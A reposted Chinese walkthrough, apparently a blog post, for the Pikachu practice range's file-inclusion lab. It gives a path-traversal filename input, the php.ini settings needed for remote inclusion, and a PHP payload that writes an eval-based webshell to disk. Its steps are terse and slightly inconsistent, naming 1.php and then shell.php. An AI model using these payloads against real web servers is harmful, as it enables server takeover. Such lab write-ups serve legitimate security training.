pikachu文件包含漏洞靶场攻略

2024/10/24 21:36:11 来源：https://blog.csdn.net/m0_75036923/article/details/141883816 浏览: 次关键词：pikachu文件包含漏洞靶场攻略

提交一个球员信息

filename后面输入../../../../../1.php访问php文件

修改配置

远程包含漏洞的前提：需要php.ini配置如下：

allow_url_fopen=on //默认打开

Allow_url_include=on //默认关闭

选择一个球员提交

创建一个2.php文件，里面输入<?php fputs(fopen("1.php","w"),'<?php eval($_POST["cmd"]);?>')?>

fileinclude目录下找到shell.php文件

访问php文件，连接

本网仅为发布的内容提供存储空间，不对发表、转载的内容提供任何形式的保证。凡本网注明“来源：XXX网络”的作品，均转载自其它媒体，著作权归作者所有，商业转载请联系作者获得授权，非商业转载请注明出处。

我们尊重并感谢每一位作者，均已注明文章来源和作者。如因作品内容、版权或其它问题，请及时与我们联系，联系邮箱：809451989@qq.com，投稿邮箱：809451989@qq.com

热文排行